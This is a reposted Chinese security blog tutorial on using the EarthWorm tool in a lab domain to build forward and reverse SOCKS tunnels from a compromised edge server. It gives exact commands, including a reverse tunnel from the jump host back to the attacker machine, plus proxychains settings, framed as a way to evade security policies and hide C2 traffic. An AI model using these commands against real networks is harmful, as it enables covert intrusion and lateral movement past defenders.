2022年4月18日04:07:08评论77 views字数 995阅读3分19秒阅读模式

何必择地？何必择时？但问立志之真不真尔？

一个资质平庸却努力上进的普通人，我希望，当我回首往事时，不因虚度年华而悔恨，也不因碌碌无为而羞愧，我可以对自己说：我，不负此生。

构建内网隐蔽通道，从而突破各种安全策略限制，实现对目标服务器的完美控制。
当我们从外网成功获得攻击点的时候，通过反弹shell、端口转发、内网穿透等技巧，来进一步入侵内网服务器。当我们取得内网目标服务器的控制权限，通过隧道技术绕过网络限制，实现隐蔽C2服务器的通信。

网络拓扑：

网络配置IP如下：

攻击机：
win10：192.168.1.6
kali：192.168.1.7

靶场：
VM1：对外边界服务器，win7
192.168.52.143
192.168.1.5

VM2：域成员，2003
192.168.52.141

VM3：域控，2008
192.168.52.138

1.1 攻击机为kali环境

ew正向代理

1.正向连接跳板机在win7机器上执行(ew_for_windows上传到跳板机)

ew_for_win_32.exe -s ssocksd -l 1090

这里还需要修改proxychains.conf配置文件

$ vim /etc/proxychains.conf

socks5 192.168.1.5 1090

测试执行：

proxychains curl http://192.168.52.143/

ew反向代理

服务端-攻击机kali

执行：

./ew_for_linux -s rcsocks -l 1080 -e 1024

客户端-跳板机

执行

ew.exe -s rssocks -d 192.168.1.7 -e 1024

配置proxychains代理链

在配置文件/etc/proxychains.conf，

将代理设置成本机的1080端口(root用户修改)：

测试执行：

proxychains curl http://192.168.52.143/

免责声明：由于传播或利用此文所提供的信息、技术或方法而造成的任何直接或间接的后果及损失，均由使用者本人负责，文章作者不为此承担任何责任。

原文始发于微信公众号（进德修业行道）：内网穿透之EarthWorm

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。